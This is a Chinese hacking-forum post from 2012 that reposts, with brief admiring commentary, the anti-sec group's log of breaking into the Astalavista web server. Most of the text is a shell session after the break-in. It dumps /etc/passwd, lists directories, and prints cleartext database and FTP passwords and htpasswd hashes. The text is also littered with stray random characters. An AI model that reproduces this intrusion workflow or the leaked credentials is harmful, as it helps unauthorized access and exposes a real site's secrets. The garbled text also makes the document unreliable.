找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2000|回复: 0
打印 上一主题 下一主题

Astalavista被蹂躏过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:07:34 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。% K! [4 W4 t: K5 d8 K5 A( ]
5 B9 Q$ [6 K3 i
[root@front3 ~]# curl -I litespeedtech.com3 S1 O7 ^( C1 D
HTTP/1.1 200 OK' y- y4 I' }0 b* u' B
Date: Fri, 05 Jun 2009 22:54:51 GMT/ j. H# ]( |' z' ]: P
Server: LiteSpeed/ ?# Y) l7 v( v/ g
! A# h0 F$ U/ b
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-3 I) ]2 g2 r" U2 K! t7 r
7 z( U. @  ]2 Z4 E
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。. }# T5 ~8 \( c3 k0 N
9 g4 C8 b: o+ u

  c' l3 _6 B/ e2 E  u+ y; f; @/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \
0 z2 A6 r( U6 v$ n7 r/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \
& k# q. k' G( G' o0 \6 m/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
) O, \- ], l9 O7 W\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /* @* N" `9 |# v6 C+ I
        \/        \/                 \/        \/       \/                     \/                 \/2 ]( `' v6 Y0 l: Y2 u
                                  The Hacking & Security Community3 G! d9 R' |. c* U1 i+ ], n/ s
[+] Founded in 1997 by a hacker computer enthusiast$ Q9 A4 `/ x2 q7 U8 v+ A
[-] Exposed in 2009 by anti-sec group0 v2 `0 j" I, [5 k
# ~# \# `4 E% K. G
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
7 s  A4 G5 _# L0 V>> 03. Who’s behind the site?
( p0 I* L& C7 j+ v>>0 ]7 e3 z$ q) ~
>> A team of security and IT professionals, and a countless number of contributors from all over the world.% ?; b% W1 w2 p' f6 q
4 V0 K  T% J, ~  [$ ?
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
: Q" S5 l/ N7 K+ P- N) V>>" M& r( C* b' Z: M; F
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
* h" g8 i0 h0 c- fmilitary institutions.
1 m' ?! P1 q) a9 h* L$ B. F: Y>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.: ?! ?9 u  L6 Y, \' Q
  [9 P) N: ?- `
Why has Astalavista been targeted?
( M) Z( h% x& G0 n% [2 Y) d) C- Q5 I
# G4 F, {' R: }0 bOther than the fact that they are not doing any of this for the “community” but
3 ]5 `* ^' z# u% Cfor the money, they spread exploits for kids, claim to be a security community9 |: Q; I4 z% `" t* M
(with no real sense of security on their own servers), and they charge you $6.66
9 H- p% e$ e. ^+ R; f; Uper months to access a dead forum with a directory filled with public releases6 }/ g/ W: m' y& B1 I7 Q! C3 h
and outdated / broken services.
$ g2 ^& N2 S' k9 f7 Y& q: H  T6 B7 t' W
We wanted to see how good that “team of security and IT professionals” really is.
# I( s9 H% H$ b" @' e! k; ?2 a6 d0 \/ |; i2 o
Let’s begin.  F0 a. g: k! L: p+ |5 k
0 o7 L. H5 S! _. N. K' D
anti-sec:~# ./g0tshell astalavista.com -p 80
, h5 }/ i+ ?+ i( O[+] Connecting to astalavista.com:800 Q9 ^& ?3 x7 W! J% A; y# u6 M
[+] Grabbing banner…
5 h& U$ ]0 c, E. |( FLiteSpeed! z5 p5 n! j2 x7 Y
[+] Injecting shellcode…
( @% T! e: H9 ^- }" a3 T$ P[-] Wait for it% k% a% R) o! ^5 X- a

, l( o6 d( D" x9 K- Y( q[~] We g0tshell, M3 E7 r( I- Z2 d. E- g
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux5 a/ o7 o3 U* ?2 G) V5 [
ID: uid=100(apache) gid=500(apache) groups=500(apache)! d) {' t9 f6 q. C  t. d

7 n. H- f# t7 g) [# p3 Xsh-3.2$ cat /etc/passwd( R) U% N$ Q9 f' j% `4 d9 @7 |: Q% S
root:x:0:0:root:/root:/bin/bash
5 [, E6 h# [- g6 m5 d0 ybin:x:1:1:bin:/bin:/sbin/nologin/ a- U) u- y* m- I0 u1 y) d
daemon:x:2:2:daemon:/sbin:/sbin/nologin  x- Z+ t. T% i2 O. q% ]
adm:x:3:4:adm:/var/adm:/sbin/nologin
4 q- i: y3 E4 y4 d! A. y" ?; ^lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  d: q  W$ n( ]0 V) B$ J6 ysync:x:5:0:sync:/sbin:/bin/sync+ X3 p; u3 @$ x- m8 E7 y( x4 s8 S3 J
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown4 @% `- L/ V3 C* l3 _
halt:x:7:0:halt:/sbin:/sbin/halt9 k# G% X  Q  a( W7 D
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
# J" G5 E- ^1 A) j% t# V. gnews:x:9:13:news:/etc/news:
3 g/ c# w! E4 ?" S5 S! z- A( }0 Fuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
/ R8 _5 ?' _$ W  V" S8 T  _operator:x:11:0perator:/root:/sbin/nologin" b5 ]$ r1 ]' ]/ e! X+ N
games:x:12:100:games:/usr/games:/sbin/nologin
' V1 _) S1 X+ ]( wgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
" L' b. r- \5 S  G  [ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
9 ?/ u3 ?  z& w. N1 R/ Cnobody:x:99:99:Nobody:/:/sbin/nologin# z0 M9 V- D% U7 u* t
rpm:x:37:37::/var/lib/rpm:/sbin/nologin( s$ }/ l2 I8 a) {* Q5 ?; k
dbus:x:81:81:System message bus:/:/sbin/nologin" ^6 S- Q) j7 F% x: |
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin8 U. l9 j0 @$ X& T; X" n
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin$ i3 W! ^) u7 d% |, ?% A( |  P7 f
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin  h9 |) h4 x' n4 A9 R( a( m
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
0 h  r) d1 D# }8 i( }haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
5 l5 C* U) l6 l- _7 o# b  mrpc:x:32:32ortmapper RPC user:/:/sbin/nologin
7 x7 e8 w7 B; C0 zrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
4 H9 k! n' ^1 ]+ V% knfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin. u" \# s2 O+ K0 E/ A; ~2 N
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin3 H; A, R5 c8 U) S0 s) u' ~. w
pcap:x:77:77::/var/arpwatch:/sbin/nologin
9 J5 A5 W2 i3 D5 Y. {* p+ anamed:x:25:25:Named:/var/named:/sbin/nologin
' `0 Y# t+ V4 v$ A" Kapache:x:100:500::/var/www:/bin/false
2 o3 I/ a! q/ L; Kdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
/ N$ ]$ c1 S: i( t# imysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash0 [' J% u5 E4 @1 ?) K0 L
webapps:x:500:501::/var/www/html:/bin/bash# _' p5 \- b) c/ r/ V
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
3 \% _6 b# E& O  I# `5 sadmin:x:501:502::/home/admin:/bin/bash7 ~, T3 R) H8 p' J2 J0 v  E- p
jon:x:502:503::/home/jon:/bin/bash
; Q6 p& b  G/ C7 E! |2 Pcom:x:503:504::/home/com:/bin/bash5 e' b' v; C% k
ntp:x:38:38::/etc/ntp:/sbin/nologin- b- F: S6 V7 m" V. U  s
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
* Z- \0 |" u& Wastanet:x:504:505::/home/astanet:/bin/bash9 T7 k! h4 F4 ~
avahi:x:70:70:Avahi daemon:/:/sbin/nologin7 a% o  o8 x$ `& r( s) b3 X" Y
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
5 [; F( Y* o8 g5 A* {: ], x$ [3 G/ `
sh-3.2$ cat /etc/hosts0 \% M" V3 O2 E- X; x
# Do not remove the following line, or various programs* e1 I  Y* O  y4 g3 A
# that require network functionality will fail.
' `( c9 o, y' w127.0.0.1       localhost.localdomain   localhost1 u! \4 d2 V% M  M1 [! ]5 V6 G' B
::1     localhost6.localdomain6 localhost6
+ n8 w4 `$ O$ y, g1 U6 {  I80.74.154.172           asta1.astalavistaserver.com: S/ G7 @$ n* D7 I6 |* t8 s

7 M; n# D0 s2 _% G1 X+ _" R( l5 xsh-3.2$ pwd6 M! S0 C8 u: ?5 D: p
/home/com/public_html
2 P( f$ C" e3 X* C% J, x
( Q# k' W% D$ }sh-3.2$ ls -la
2 Y7 }$ j, p. L' d2 b- I2 Xtotal 18460$ M' q5 a8 U, ?3 M( h& S( ]" L
drwxr-xr-x 30 com apache     4096 May 28 17:06 .
1 n) ?5 x- K6 K1 Adrwx–x–x 11 com com        4096 Jun 25  2008 ..# @# ~& T! X& v+ d$ N
drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
& ?6 V3 T2 M+ Ddrwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
9 b) C/ m. }8 l/ y: _1 v3 @! odrwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
. q" h  e% q; @. ?! l5 o5 pdrwxrwxrwx  2 com com        4096 May 19 00:50 config
5 L8 K7 X# x" y/ Ndrwxr-xr-x  2 com com        4096 Mar 20 11:05 core
5 u+ C" s$ _' l. S1 edrwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
4 t/ ^2 t! E1 f1 Ydrwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing3 ?5 O( p; x& S5 |, c. I
drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
7 K5 ~. d* C0 y7 _. Idrwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__" x! m' ?% n: \/ G6 _/ k
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php" H7 T* h2 r8 g) S9 d$ [; ^
drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
' ]! n: p1 i, |  v4 c; Q% x1 zdrwxr-xr-x  3 com com        4096 Feb  2 19:29 editor! ?( P- [/ I$ \5 Y* M2 u
-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico
  |: r% ^9 B0 w4 |& y+ z6 U( e, D! udrwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
/ ~6 s9 _% e% I2 R( e3 {-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
( C& ?8 e% l3 S' E0 ]- Y: d- ^# b-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak+ k( m1 n. Y+ B$ I/ J# M- w! o2 u3 E$ v
-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak
' e1 t8 Y( q7 e, jdrwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool/ f8 }5 G" }3 ^% e; n
drwxrwxrwx 14 com com        4096 Feb  2 19:29 images) `  K4 [! }; ^
-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php
6 {0 s4 k; w) k, qdrwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
3 a* v0 N# i+ g% B$ udrwxr-xr-x  8 com com        4096 Feb  2 19:29 lang8 |+ f( f' C3 I( I+ K6 r" }
drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib- U9 i8 ]3 y2 t* J9 w) c- u
drwxrwxrwx 12 com com        4096 Jun  2 07:47 media) [9 n  N. k1 }5 V- Z5 _& ^2 [, p; n
drwxr-xr-x  8 com com        4096 May 11 12:48 modifications) j; r2 W6 R; @1 `4 i/ J3 ^9 k
drwxr-xr-x 34 com com        4096 May 28 16:30 modules4 \' ~2 N1 g% ~( I5 G
drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin0 C2 G3 f9 ~/ G6 v
drwxrwxr-x 22 com com        4096 May 28 17:06 _new# Y" [+ x1 x! _! z3 c/ v  \
drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
: T1 ?8 e9 L9 E/ R  e  Q# Gdrwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy2 r, @3 M1 T9 s! A0 o9 I
drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy2 q( P+ v" L' J3 Z1 y7 f6 q
-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt
, m% B( w7 f5 m-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml, t( t3 y. s6 F! L+ R/ W
-rw-r–r–  1 com com         223 Mar 30 15:32 test.php
; N- |4 F' ^8 ?drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes" L! h$ ^6 }( _5 a* ^
drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp) ], x  j$ B% Y% ]
drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam
* G" F+ O: a5 d$ ?: K7 R
) _  i' E# T: r3 L0 Ush-3.2$ head -20 index.php
6 \9 S& N& P: W( t<?php2 `; H5 O& @/ ?" z% V

1 R* W: X- `7 F) I- I/**
. I( S# T$ T# D! O0 Z0 q* The main page for the CMS' O+ Q! B  d% D+ C9 s* P2 T
* @copyright   CONTREXX CMS - COMVATION AG1 x3 v+ A& K& D& T6 N7 F
* @author      Comvation Development Team) K' F0 `$ n; O
* @version     v1.0.9.10.1 stable  }: E( X9 P; @% `6 {
* @package        contrexx
$ {0 K% p1 R( J8 m* @subpackage    core9 m5 ~7 P4 u- G+ N4 M
* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
+ Z1 D6 n* u* A" X* @since       v0.0.0.0
% ]7 C# y9 O9 ]( W& e) k+ Q! I* @todo        Capitalize all class names in project0 b1 s  }+ N$ q' L8 q
* @uses        /config/configuration.php
, e/ k; j! n) Z  e1 N$ X3 d* @uses        /config/settings.php
6 O( W% U4 t& D, H: e; S* @uses        /config/version.php9 u. P( R  D( @! D& e( _* l
* @uses        /core/API.php  J8 M8 C# O# x: f! {1 Z
* @uses        /core_modules/cache/index.class.php
& }2 u0 t/ G+ D! w$ }- B' D0 S* @uses        /core/error.class.php! l# c4 m2 ~, S+ _
* @uses        /core_modules/banner/index.class.php$ j; x! n+ B; G" s% K
* @uses        /core_modules/contact/index.class.php
  g. L1 d) w! p) x+ y' n, a4 l/ I) H0 b
sh-3.2$ cd config/
+ W( x% g9 H) U2 w: W* Dsh-3.2$ ls -la
% Y8 y5 s# ?' H7 n" k/ `& `total 32# v; l: ~) o# S3 q5 e/ M& ?
drwxrwxrwx  2 com com    4096 May 19 00:50 .; Q: A* W% s# b6 h. }, i
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..  N$ D( Q0 t* {+ [6 P
-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php8 Y7 X+ o7 d8 `- o' }- e% U
-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
& E* \6 g% D) k+ W  |" y% O-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php: z# r: \; w" }, H
-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php+ l$ e% _8 u6 z/ F, o2 A# ~7 [
; z, ?! U' F! k5 x. i/ n" K8 H8 n
sh-3.2$ cat configuration.php
* X1 N: w% {/ g* C' d[snip]
% p4 R0 U* z  ^; Q$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
. Y% Q3 Q, z. \+ k8 L* u5 L: R6 o. I$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
' q# q; ~% Y. z- P9 r" V$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix8 e3 F8 K4 l1 q& I1 c; w& e. d
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
$ h5 L! J; y- e9 ?: Z! n# M5 P& v$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password, o3 V$ w0 I' T; l2 U( e- u
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)6 O+ N! `: `. ]! A3 n
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)3 i. }! ]' F0 x
[snip]
3 M5 l$ R! U; a6 |$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
  o( O3 W  z7 r1 x6 b8 i( _$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode; n# A( W1 U7 G9 g. Y  k
$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost
' z  O, ^" `! y9 y' s$_FTPCONFIG['port'] = 21; // Ftp remote port
% ?0 ]( d, a% e' V5 z- o9 B3 c$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
  @! ^# K/ f/ T) r; K$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
, c- ]/ i5 v1 p  p$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms8 u6 D* i" x9 H8 u' R7 f) [
; {4 H; _: k, |# @
sh-3.2$ cd ..
3 K) ]; l: W: D% Y8 J2 @9 ~' ssh-3.2$ cd dvd/
; p" R- M1 m/ d( esh-3.2$ ls -la4 w( V) j, i! M  H+ ]% V
total 2913780
/ @- C. `, q  |1 P$ w% I; bdrwxr-xr-x  2 com com          4096 Sep  9  2008 .
6 g8 J) U9 N% f& x; H, Gdrwxr-xr-x 30 com apache       4096 May 28 17:06 ..
4 n7 l4 v+ {, Q+ a-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar
% V- n! _2 g1 O7 d-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar
2 G4 f9 t  w, q" A* G-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar$ L3 h: b9 @3 `: q
-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess
: J( D, ^2 H5 V; f+ Z9 l& }! s5 ]3 C- r
sh-3.2$ cat .htaccess
, ?4 \5 `$ [* M  c4 v0 d3 RauthType Basic
$ c) {2 D$ _) z8 j$ PauthName DVD* ~3 A( h7 n# ^1 K
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
. _& o  i) `8 i6 q( M4 n$ d3 Srequire valid-user
  ~$ ^2 Q- z0 S
7 s& X- w! N/ l2 ash-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd- z5 S! B. O. x0 L/ B/ Z% M( u
DVDdownload:CRD8cuY6.MPT6$ t. R1 `* C$ I2 X: b( ]9 y7 a- B
DVDdownload2:CR8a36.wluFMg! Q1 q+ ^4 D+ ]

% x* P2 T* c" h8 msh-3.2$ cat test.php+ L) u4 G/ d% T. `* R
<?php
4 {' I, M. B; y- [. ?' }$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;) x$ m. k2 d4 Q4 i
$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));3 ~$ s. I4 E, y% {+ c! i
echo $url;+ p8 A, q* E; P* i
?>
. y% j0 Z& \' o8 v5 ]5 F- m- }! s. m
sh-3.2$ cd modifications/
1 ^+ x( Y$ R2 ~sh-3.2$ ls -la
+ X0 V; h9 r. P. x. Ytotal 32- r& E5 {- e+ P
drwxr-xr-x  8 com com    4096 May 11 12:48 .
  K: G% |& k% o. J% _( K0 Adrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
/ o) C  K3 C- _+ X6 s2 Pdrwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng; `2 i% f, e  u# p0 k
drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs! n, A4 v8 @# @2 d; y; _) h" |
drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools0 X: a5 w8 N* c
drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc  Q( \% @  V* [* B% I
drwxr-xr-x  2 com com    4096 Feb  2 19:33 search2 ~  G% S4 B* t" L$ F2 ?9 A1 a3 a
drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
) y5 o' J) y% S
  L0 O& O7 ^8 fsh-3.2$ ls -R6 X$ x& v3 x- X/ ^) d: l1 Q
.:% I8 M3 P  h6 i% y: ?' O
com_avtng  cronjobs  onlinetools  pjirc  search  _tmp
6 }! \9 y1 r6 q# E$ ~" a- f. ~/ Z9 v- a  X
./com_avtng:
2 P1 V9 E- p5 t/ g0 C. W9 vavtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts
, w: p! `: E+ u0 U: P1 [/ D7 G) {
# I; `- h( m6 v* b# `./com_avtng/scripts:
! P! O) C; c/ f! V* j& U' [, [popunder.js9 R9 F& }' c/ E" r; U5 Y

6 Y1 A* J. I- S& k( ^- ]./cronjobs:( p/ n0 s( x$ Q5 o. C8 q
exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp
6 D3 r5 x+ Q, U; v& J" ~" h2 Z3 N6 j: U
./cronjobs/tmp:/ a  U7 Y0 ^, R. b0 X7 b$ m
contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
2 j) ^- Y! x. i2 X+ Z# f; m: k; L1 T9 K+ x" b; N, f
./onlinetools:
3 \% q! @$ _" }0 Pindex.php# d; R$ {/ D( ~* r$ ]
. d& b4 |% a0 @1 e/ ?% ^
./pjirc:
( @3 A6 b) f% z2 {4 w- m% ga_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt9 |0 ]% @" o. p; i  J: ]
AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt
' A$ C, x* m) Y  t) H% L  p$ f1 @3 Lbackground.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
0 ^1 K1 M, ]. }
; w% ?7 I* }! o. P2 O  L./pjirc/img:
* u/ k- y* q0 t' _1 _ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif
5 ?9 a6 s/ j) L' darbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   ) d8 s8 W3 d7 b4 y
verre-eau.gif7 W: w" Q1 B/ \  _9 l
argh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  
9 w9 D) B5 j& I7 z- L. Pverre-vin.gif
' ~6 F9 ]* x6 w$ V5 W8 T/ {ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
2 C( S8 y# D+ q8 n" h" y& k, [/ fbiere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif- Y3 w4 t- w: ~$ \- l( p! v  H
/ m5 K8 R8 l0 W0 e5 a3 p! c* G
./pjirc/snd:
; t# }: ^. b9 D& Pbell2.au  ding.au. W  k$ r! c- J) J6 A) \0 x" c; E
8 U" P: q9 I0 V- T
./search:" L% F" n$ t& W! Q0 `& l; ]
searchEngines.php  search.php& O# N. u& m: ^5 k* T5 ~4 Z2 j
) ]  W: a7 q6 _# c  h
./_tmp:
$ z, F2 c! M: t  O; `defaultPorts.php  defaultPorts.txt. C. E& r: _% c8 p2 u

9 C+ S9 S; G6 }9 r% ysh-3.2$ cd cronjobs/: d$ p1 W# R& w
sh-3.2$ cat exploits.php
  c+ p" S4 ]# g[snip]" V  D/ F( F1 f: @  |' C$ N, s
$categories   = array();2 G* R/ S) v. y
$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
! _; C4 ~7 j5 }: ]" f0 `$expolits     = file($milw0rmFile);# ?5 d' e2 W9 K% z
$comExploits  = array();
" u: |: u  E9 L+ P* C6 k' C[snip]
6 ^% J+ e; R2 b& j0 V) B// manage data3 |, H- t* u6 d+ _# @
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640; A, V0 P5 m) l$ ~* b3 I- n9 ?% M

) B* C, N& R2 @    // get path and title
' |9 `) f( k- E, V    $expolits[$x] = trim($expolits[$x]);
: i/ W; y0 f  H) S! u    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));) \$ R$ G# @# c
    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);; v3 ~) a8 [, ]6 Q/ G% u

: ^* C) I* ~: Z! n+ j- J% H. z7 J    // check if file exists& s6 x3 m7 I) F+ W! Z; u' f' f
    if (file_exists($path)) {
+ {* _8 I9 o5 X- m5 C/ i/ }
& n6 H9 q; B% y3 n4 A. Y  s        $text = file_get_contents($path);
9 `+ ~  P6 S* I! a/ Y/ v& r
+ a  w5 K9 R5 x        // get content and date
( [8 {/ X3 U7 c3 j" a        //$text = htmlspecialchars($text, ENT_QUOTES);
0 p( V. q1 ?1 h        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));
( u. c* A9 h  ?        if ($tmptext != ”) {
3 f  a, R$ m- {" \5 V/ Q            $text = $tmptext;
, q# m# ?/ c9 [7 F* Y. [        } else {! Y; c6 @* Y3 i4 M5 D4 w
            $text = addslashes(htmlentities($text,  ENT_QUOTES));8 [! y9 Q0 ~6 g) _, b1 o2 s1 k
        }% H$ {# y9 W4 {: Y7 M
        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));* Q0 e, T8 \. t: v6 G
        $tmp  = explode('-', $date);
" J& B$ y& m, G1 z        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
1 {  T: y5 i5 K" Z0 f% `        $cat  = getCategory ($path);4 W3 m. ^/ |; q8 ?  W. J8 U( `
        $ext  = pathinfo(basename($path));
0 P+ y6 X1 u( @' t+ w9 T5 i+ C        $ext  = $ext['extension'];1 d( D+ v4 \. R! c0 U; B0 w1 Y5 F  U
        $qStr = ”% {$ a! m. c( O) H2 @
            SELECT  `id`! G. {) D  P' T: H
            FROM    `contrexx_module_exploits`
: [- ~6 K4 N# S; N/ o' r. u" c8 \; x            WHERE   `title`  =  ‘” . $title . “‘. M9 p9 h! g( Y! C* U& `
            AND     `date`   =  ‘” . $date . “‘
+ G# Y4 t, A3 G0 A$ Z        “;
7 T, {5 Z' Y  d/ @2 b        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;! J  B0 Z5 i& O9 m, d# I1 m- @4 ?; h$ ~
        $q = $_objDB->query($qStr);; f2 G, |- m1 k2 k

2 d( F  F$ T$ ~5 p' H8 \8 T        if ($q->numRows() == 0) {, D! s" U0 e- P' \3 X
- x/ Z7 C" v7 M  y1 [& t
            // prepare array
) K5 S; M( ?5 Z4 p2 [( X            $comExploits[$x]['date']      = $date;
: c% d3 x0 C4 A. h            $comExploits[$x]['title']     = $title;
' ^$ q: h- q$ M- ^2 F( ~            $comExploits[$x]['author']    = ‘milw0rm’;
' s% x2 v- L) T# t0 z            $comExploits[$x]['text']      = $text;; I* _3 A% I  l) f! {
            $comExploits[$x]['source']    = $ext;/ h; G! _$ l; Q% x
            $comExploits[$x]['url1']      = ”;
( ?) v! z# R( O1 O9 T/ k; G            $comExploits[$x]['url2']      = ”;
2 n* v3 z) ^2 @9 z3 e, X            $comExploits[$x]['catid']     = $cat;2 M1 ?) t( K1 ^
            $comExploits[$x]['lang']      = ‘2′;" ^7 w% s) Q( P# H
            $comExploits[$x]['userid']    = ‘12′;
* o; s/ {9 `! j            $comExploits[$x]['startdate'] = ‘0000-00-00′;
  ^: {0 p" T  D- Y            $comExploits[$x]['enddate']   = ‘0000-00-00′;
/ s7 V# y" [- n# }; E            $comExploits[$x]['status']    = ‘1′;
